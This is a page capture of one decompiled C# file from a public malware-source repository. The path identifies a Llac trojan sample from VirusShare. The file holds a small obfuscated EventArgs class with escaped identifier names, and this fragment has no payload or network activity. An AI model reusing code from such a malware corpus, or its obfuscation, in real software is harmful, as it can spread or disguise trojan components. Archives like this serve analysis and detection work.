MalwareSourceCode/MSIL/Trojan/Win32/L/Trojan.Win32.Llac.aamy-d1153c91831872cfeacf510426d9b4752eab5933102816559dcd2628b12a7253/_0005/_0001.cs
2022-08-18 06:28:56 -05:00

62 lines
1.5 KiB
C#
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: .
// Assembly: syncuiLoader, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F112AE9C-7564-463C-8834-3BB2BC4FBE1B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Llac.aamy-d1153c91831872cfeacf510426d9b4752eab5933102816559dcd2628b12a7253.exe
using System;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
namespace \u0005
{
internal sealed class \u0001 : EventArgs
{
private \u0003.\u0003 \u0001;
private Exception \u0001;
private bool \u0001;
private bool \u0002 = true;
private bool \u0003 = true;
private bool \u0004;
[SpecialName]
public Exception \u0003() => this.\u0001;
[SpecialName]
public bool \u0003() => this.\u0001;
[SpecialName]
public bool \u0004() => this.\u0002;
[SpecialName]
public bool \u0005() => this.\u0003;
internal void \u0003() => this.\u0001 = true;
internal void \u0004() => this.\u0002 = false;
internal void \u0005() => this.\u0003 = false;
[SpecialName]
public bool \u0006() => this.\u0004;
[SpecialName]
public void \u0003([In] bool obj0) => this.\u0004 = obj0;
public void \u0006()
{
if (!this.\u0001)
return;
this.\u0001.\u0003();
}
public bool \u0007() => this.\u0002 && this.\u0001.\u0003();
internal \u0001([In] \u0003.\u0003 obj0, [In] Exception obj1)
{
this.\u0001 = obj0;
this.\u0001 = obj1;
}
}
}